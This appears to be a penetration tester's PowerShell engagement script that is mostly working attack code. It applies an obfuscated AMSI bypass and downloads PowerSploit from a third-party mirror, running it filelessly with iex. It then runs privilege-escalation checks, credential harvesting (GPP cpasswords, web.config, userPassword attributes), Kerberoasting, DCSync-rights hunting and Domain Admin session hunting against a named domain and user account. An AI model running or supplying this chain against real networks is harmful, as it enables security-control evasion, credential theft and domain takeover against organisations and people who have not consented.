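###########################################################################
# REMEMBER: Ctrl+F for "#!" to find the steps that must be run by hand     #
###########################################################################
# Engagement notes.  Meant to be pasted into an interactive PowerShell
# session on the foothold host: it disables AMSI for this process, loads
# PowerSploit straight from a web mirror (nothing is written to disk), then
# starts the PowerUp local privilege-escalation checks.

# --- AMSI bypass (this process only) --------------------------------------
# AMSI scans script content at runtime.  Setting the private static field
# System.Management.Automation.AmsiUtils.amsiInitFailed to $true makes this
# process behave as if AMSI never initialised, so the content iex'd below is
# not scanned.  The type and field names are assembled with -f so the literal
# strings do not appear in the script text.  Scope: this PowerShell process
# only -- child processes and other sessions keep AMSI.
$a = 'System.Management.Automation.A'; $b = 'ms'; $u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a, $b, $u))
if (-not $assembly) { throw 'AmsiUtils type not found; AMSI bypass not applied' }
$field = $assembly.GetField(('a{0}iInitFailed' -f $b), 'NonPublic,Static')
$field.SetValue($null, $true)
# Fail fast: if the flag did not flip, the first iex below gets scanned and
# everything after it silently ends up undefined.
if (-not $field.GetValue($null)) { throw 'AMSI bypass did not take effect' }

# --- Remote loading -------------------------------------------------------
# Let WebClient negotiate TLS 1.2 (older Windows PowerShell builds default to
# TLS 1.0/1.1, which GitHub and most CDNs refuse).  OR-ed in so protocols that
# are already enabled are kept.
[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12

# https://github.com/AlecMcCutcheon/ImportFromURL -- helper for loading
# modules from a URL without touching disk.  Nothing below depends on it; it
# is kept for interactive use.
New-Module -Name ImportFromURL -ScriptBlock ([ScriptBlock]::Create((New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/AlecMcCutcheon/ImportFromURL/main/ImportFromURL.psm1")))

# SECURITY (review): every file below is fetched over HTTPS from a third-party
# mirror and executed with iex exactly as received.  There is no integrity
# check, so whoever controls dl.crihexe.com (or can tamper with the path to
# it) gets code execution in this session with the operator's privileges.
# Before using this on a client network, compare a SHA-256 of each downloaded
# string against a value computed from a copy you have reviewed.
$PowerSploitBase = 'https://dl.crihexe.com/powersploit/PowerSploit'
# Relative paths, grouped by PowerSploit module.  The *.psd1 manifests the
# original notes also fetched are left out: a manifest is just a hashtable
# literal, so iex'ing it only echoes that hashtable and defines nothing.
$PowerSploitScripts = @(
    # Recon (PowerView lives here)
    'Recon/Get-ComputerDetail.ps1'
    'Recon/Get-HttpStatus.ps1'
    'Recon/Invoke-CompareAttributesForClass.ps1'
    'Recon/Invoke-Portscan.ps1'
    'Recon/Invoke-ReverseDnsLookup.ps1'
    'Recon/PowerView.ps1'
    # AntivirusBypass
    'AntivirusBypass/Find-AVSignature.ps1'
    # Persistence
    'Persistence/Persistence.psm1'
    # Privesc (PowerUp lives here)
    'Privesc/Get-System.ps1'
    'Privesc/PowerUp.ps1'
    # ScriptModification
    'ScriptModification/Out-CompressedDll.ps1'
    'ScriptModification/Out-EncodedCommand.ps1'
    'ScriptModification/Out-EncryptedScript.ps1'
    'ScriptModification/Remove-Comment.ps1'
)
# iex evaluates in the caller's scope.  Keep this a plain foreach at script
# level, not a function: inside a function each script would get the
# function's scope and the cmdlets it defines would vanish on return.
foreach ($relativePath in $PowerSploitScripts) {
    $url = "$PowerSploitBase/$relativePath"
    $code = (New-Object System.Net.WebClient).DownloadString($url)
    # DownloadString throws on HTTP errors; an empty 200 would otherwise be
    # iex'd silently and the missing cmdlets only show up much later.
    if ([string]::IsNullOrWhiteSpace($code)) { throw "Empty response from $url" }
    Invoke-Expression $code
}
# Sanity check that the two modules everything else relies on really loaded.
foreach ($required in 'Get-DomainUser', 'Invoke-PrivescAudit') {
    if (-not (Get-Command $required -ErrorAction SilentlyContinue)) {
        throw "$required is not available; check the downloads above"
    }
}

# --- Local privilege escalation: PowerUp ------------------------------------
# Look for host misconfigurations before touching the domain.
Invoke-PrivescAudit       # runs every PowerUp check and reports what it finds
Find-ProcessDLLHijack     # running processes that load a DLL from a path we can write to
Find-PathDLLHijack        # %PATH% directories writable by the current user
Get-CachedGPPPassword     # cpassword values in locally cached Group Policy Preference XML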
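# --- Local privilege escalation: PowerUp, continued -------------------------
Get-ApplicationHost                 # credentials stored in IIS applicationHost.config
Get-Webconfig                       # credentials stored in web.config files
Get-RegistryAlwaysInstallElevated   # AlwaysInstallElevated set in HKLM and HKCU
Get-RegistryAutoLogon               # Winlogon auto-logon credentials
Get-ModifiableRegistryAutoRun       # autorun entries whose target we can modify
Get-ModifiableService               # services whose configuration we can change
Get-ProcessTokenGroup               # groups in the current process token
Get-ProcessTokenPrivilege           # privileges in the current process token
#! Depending on the two token listings above, Enable-Privilege may be able to
#  switch on a privilege that is present but disabled in the token.  Run it by
#  hand with the privilege name taken from Get-ProcessTokenPrivilege.
#Enable-Privilege

# ============================ AD recon with PowerView ========================
# Reference: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview
# Assumes PowerView 3.0 (the Get-Domain* cmdlets and -UACFilter used here do
# not exist in 2.x); the Get-Net* names are kept where they are plain aliases.
# Almost everything here is LDAP reads against a DC, which is comparatively
# quiet.  Lines marked NOISY contact every host in the domain (ICMP, SMB, RPC)
# and will show up in host and network telemetry -- run them on purpose, one
# at a time, not as part of a batch.  Queries that the original notes ran
# twice were collapsed to a single run.

# --- Engagement parameters: review before running anything below ------------
#! Target domain.  If Get-DomainController fails, re-check this spelling first.
$TargetDomain = 'iav.it'
# Distinguished name of the domain head, derived from the DNS name
# ('iav.it' -> 'DC=iav,DC=it'); used wherever a search base is needed.
$TargetDomainDN = 'DC=' + (($TargetDomain -split '\.') -join ',DC=')
#! One account to inspect in detail; pick names from the user dump.
$TargetUser = 'dinicola.cri.2005'
#! OU whose computers you want listed; must match a name from Get-DomainOU.
$TargetOU = 'Servers'
#! SID of the principal whose ACEs you want to see (for example the objectsid
#  from Get-DomainUser -Identity $TargetUser).  Left empty, that query is skipped.
$sid = ''

# --- Domain, policy, controllers, forest ------------------------------------
Get-Domain                                  # current domain object
Get-DomainSID                               # SID of the current domain
Get-DomainPolicy                            # full policy; Get-DomainPolicyData is the same cmdlet
(Get-DomainPolicy).KerberosPolicy           # ticket lifetimes (MaxServiceAge, ...)
(Get-DomainPolicy).SystemAccess             # password / lockout policy
(Get-DomainPolicy).PrivilegeRights          # user-rights assignments
Get-DomainController | Select-Object Forest, Domain, IPAddress, Name, OSVersion | Format-List
#! If this returns nothing or errors, $TargetDomain is probably wrong.
Get-DomainController -Domain $TargetDomain  # all DCs of the target domain, all properties
Get-ForestDomain                            # every domain in the forest
Get-ForestGlobalCatalog                     # global catalog servers

# --- Users ------------------------------------------------------------------
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE | Select-Object samaccountname, description, pwdlastset, logoncount, badpwdcount   # enabled accounts
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
Get-DomainUser -UACFilter ACCOUNTDISABLE                                       # disabled accounts
Get-DomainUser -Properties name, description                                   # descriptions often hold hints
Get-DomainUser -Properties name, pwdlastset, logoncount, badpwdcount           # stale / locked-out hints
Get-DomainUser -Properties name, MemberOf | Format-List                        # group membership per user
Get-DomainUser -Identity $TargetUser                                           # everything about one account
Find-UserField -SearchField Description -SearchTerm "built"                    # accounts whose description contains "built"
Get-DomainUser -LDAPFilter '(sidHistory=*)'                                    # sidHistory populated
Get-DomainUser -PreauthNotRequired                                             # AS-REP roastable
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname       # Kerberoastable
#! The admin group may be localised (Italian name); check the dump and adjust the pattern.
Get-DomainUser -SPN | Where-Object { $_.memberof -match 'Domain Admins' }      # Kerberoastable *and* Domain Admin
Get-DomainUser -TrustedToAuth | Select-Object userprincipalname, name, msds-allowedtodelegateto   # constrained delegation
Get-DomainUser -AllowDelegation -AdminCount                                    # privileged accounts not marked "sensitive, cannot be delegated"
Get-DomainUser -UACFilter ENCRYPTED_TEXT_PWD_ALLOWED | Select-Object samaccountname, useraccountcontrol   # reversible encryption (cleartext via DCSync)
Get-DomainUser -UACFilter SMARTCARD_REQUIRED                                   # smart-card-only accounts
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname
# PASSWD_NOTREQD exempts the account from the password policy: empty or
# shorter passwords are possible if the domain allows them.
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname, useraccountcontrol
# Accounts with a value in the userPassword attribute, decoded as ASCII.
$FormatEnumerationLimit = -1
Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname, memberof, userPassword |
    ForEach-Object {
        Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru
    } | Format-List

# --- Groups -----------------------------------------------------------------
Get-DomainGroup | Select-Object samaccountname, admincount, description
Get-DomainGroup | Where-Object Name -like "*Admin*" | Select-Object SamAccountName
#! Mind the domain.
Get-DomainGroup -Domain $TargetDomain
#! Mind the group name (see the localisation note above).
Get-DomainGroup 'Domain Admins'
Get-DomainGroup -AdminCount | Select-Object name, memberof, admincount, member | Format-List   # protected groups
Get-DomainGroup -MemberIdentity $TargetUser                                    # groups the target user belongs to
Get-DomainGroupMember -Identity "Administrators" -Recurse                      # nested membership is expanded
#! "Enterprise Admins" only exists in the forest root domain.
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain $TargetDomain
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | Where-Object { $_.MemberName -like '*$' }   # machine accounts in privileged groups
Get-NetGPOGroup                                                                # restricted groups pushed by GPO
#! Local groups of a single host (needs admin rights there unless it is a DC);
#  substitute a real host name from the computer list:
#Get-NetLocalGroup -ComputerName <host> -ListGroups
#Get-NetLocalGroupMember -ComputerName <host>

# --- ACLs -------------------------------------------------------------------
# Who can replicate the domain (DCSync) or holds GenericAll on the domain head.
# With -ResolveGUIDs the extended-right name lands in ObjectAceType on
# PowerView 3.0 (the 2.x property was ObjectType).
Get-DomainObjectAcl -Identity $TargetDomainDN -ResolveGUIDs |
    Where-Object { ($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') } |
    Select-Object SecurityIdentifier, ActiveDirectoryRights, ObjectAceType
# Principals with rights on AdminSDHolder (those ACEs get applied to every
# protected object).
Get-DomainObjectAcl -SearchBase "CN=AdminSDHolder,CN=System,$TargetDomainDN" -ResolveGUIDs |
    ForEach-Object { $_.SecurityIdentifier } | Convert-SidToName
#! ACEs granted to one principal, domain-wide.  -Identity * walks the ACL of
#  every object, so this is slow on a large domain; $sid must be set above
#  (the original notes ran this with $sid never assigned, matching nothing).
if ($sid) {
    Get-DomainObjectAcl -ResolveGUIDs -Identity * | Where-Object { $_.SecurityIdentifier -eq $sid }
} else {
    Write-Warning '$sid is empty; skipping the per-principal ACE query'
}
# Interesting ACLs
Invoke-ACLScanner -ResolveGUIDs | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights | Format-List
#! Hosts where a given user or group ends up local admin through GPO:
#  Get-DomainGPOUserLocalGroupMapping -Identity <user or group>

# --- Computers and OUs ------------------------------------------------------
Get-DomainComputer | Select-Object samaccountname, operatingsystem
Get-DomainComputer -Properties DnsHostName                                     # DNS names of all computers
Get-DomainComputer -Ping                                                       # NOISY: one ICMP probe per host
Get-DomainComputer -Unconstrained | Select-Object samaccountname               # unconstrained delegation; DCs always appear and are not useful for privesc
Get-DomainComputer -TrustedToAuth | Select-Object samaccountname               # constrained delegation
Get-DomainOU -Properties Name | Sort-Object -Property Name                     # OU names
#! $TargetOU must be one of the names listed above.
Get-DomainOU $TargetOU | ForEach-Object { Get-DomainComputer -SearchBase $_.distinguishedname -Properties Name }   # computers inside that OU
#! GPO and ACL walkthroughs still to be gone through:
#  https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview#group-policy-object-gpos
#  https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview#acl

# --- File servers and shares ------------------------------------------------
Get-NetFileServer                      # file servers; many users tend to have sessions on these
Find-DomainShare -CheckShareAccess     # NOISY: connects to every host; lists shares the current user can read
Find-InterestingDomainShareFile        # NOISY: walks those shares for interesting files (filters available)

# --- Trusts -----------------------------------------------------------------
Get-DomainTrust                                      # parent, child and external trusts of the current domain
Get-ForestDomain | Get-DomainTrust                   # trusts of every domain in the forest
Get-DomainTrustMapping                               # walks all reachable trusts
Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)"   # trusts as seen through the global catalog
Get-NetForestTrust                                   # forest trusts (root <-> root only; child-to-root is just an external trust)
Get-DomainForeignUser                                # users with privileges in other domains of the forest (was misspelled Get-DomainForeingUser)
Get-DomainForeignGroupMember                         # groups with members from other domains of the forest

# --- Lateral-movement leads -------------------------------------------------
# NOISY: asks the DC for every computer, then tests local admin access on
# each over RPC/SMB -- one connection per host.  If RPC/SMB are filtered use
# Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt instead (it is a
# separate script, not loaded here; take the computer list from the dump).
Find-LocalAdminAccess
# NOISY: takes the Domain Admins members (default) and runs
# Get-NetSession/Get-NetLoggedon against every host to see where they are
# logged on; -CheckAccess also tests local admin on each host.
Invoke-UserHunter -CheckAccess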
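# --- Hunting logged-on users and local admins (NOISY: contacts every host) --
# On PowerView 3.0 Invoke-EnumerateLocalAdmin and Invoke-UserHunter are aliases
# of Find-DomainLocalGroupMember and Find-DomainUserLocation, so each hunt is
# run once here instead of once per name.
# Members of the local Administrators group (default) on every domain host.
Find-DomainLocalGroupMember
# Users with sessions on hosts that allow unconstrained delegation.
Find-DomainUserLocation -ComputerUnconstrained -ShowAll
# Privileged (admincount) accounts that are allowed to be delegated, logged on
# to hosts with unconstrained delegation.
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
# Where Domain Admins (the default target group) are logged on, using
# Get-NetSession/Get-NetLoggedon on each host; -CheckAccess also tests local
# admin there.  The original notes wrote the switch as the literal "[-CheckAccess]"
# copied from the docs, which binds as a bogus positional argument.
Find-DomainUserLocation -CheckAccess
# Same hunt for members of the "RDPUsers" group.
Find-DomainUserLocation -GroupName "RDPUsers"
# Only queries high-traffic servers (DCs, file servers, DFS) -- fewer hosts touched.
Find-DomainUserLocation -Stealth
#! Still to go through by hand:
#  https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview#deleted-objects
#  https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview#misc

# --- Kerberoast -------------------------------------------------------------
#! Set this to the SPN account(s) you actually want to roast.  Without
#  -Identity, Invoke-Kerberoast requests a service ticket for EVERY account
#  with an SPN in the domain, which is loud (one TGS request per account).
#  The original notes had the literal "[-Identity websvc]" copied from the docs.
$KerberoastIdentity = @()
if ($KerberoastIdentity.Count -gt 0) {
    Invoke-Kerberoast -Identity $KerberoastIdentity
} else {
    Write-Warning 'KerberoastIdentity is empty; refusing to roast every SPN account. Set it and re-run.'
}
# More user enumeration:
# https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters#users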